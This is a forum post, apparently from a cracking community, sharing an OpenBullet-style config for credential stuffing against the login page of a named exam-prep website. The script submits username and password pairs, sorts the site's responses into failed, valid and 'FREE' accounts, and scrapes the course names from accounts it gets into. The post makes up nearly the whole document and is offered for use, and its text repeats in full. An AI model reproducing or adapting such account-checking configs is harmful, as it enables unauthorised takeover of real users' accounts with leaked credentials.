- Thread Author
- #1
[hide]REQUEST POST "https://www.prepaway.com/login.html"
CONTENT "act=login&login=<USER>&pass=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Failure OR
KEY "Incorrect e-mail or password!"
KEYCHAIN Success OR
KEY "My Account"
KEYCHAIN Custom "FREE" OR
KEY "You have no current products available."
PARSE "<SOURCE>" REGEX "<tr>\s*<td>([^<]*)" "[1]" Recursive=TRUE -> VAR "Course"[/hide]
leave a like if you appreciate it
Config Dead
CONTENT "act=login&login=<USER>&pass=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Failure OR
KEY "Incorrect e-mail or password!"
KEYCHAIN Success OR
KEY "My Account"
KEYCHAIN Custom "FREE" OR
KEY "You have no current products available."
PARSE "<SOURCE>" REGEX "<tr>\s*<td>([^<]*)" "[1]" Recursive=TRUE -> VAR "Course"[/hide]
leave a like if you appreciate it
Config Dead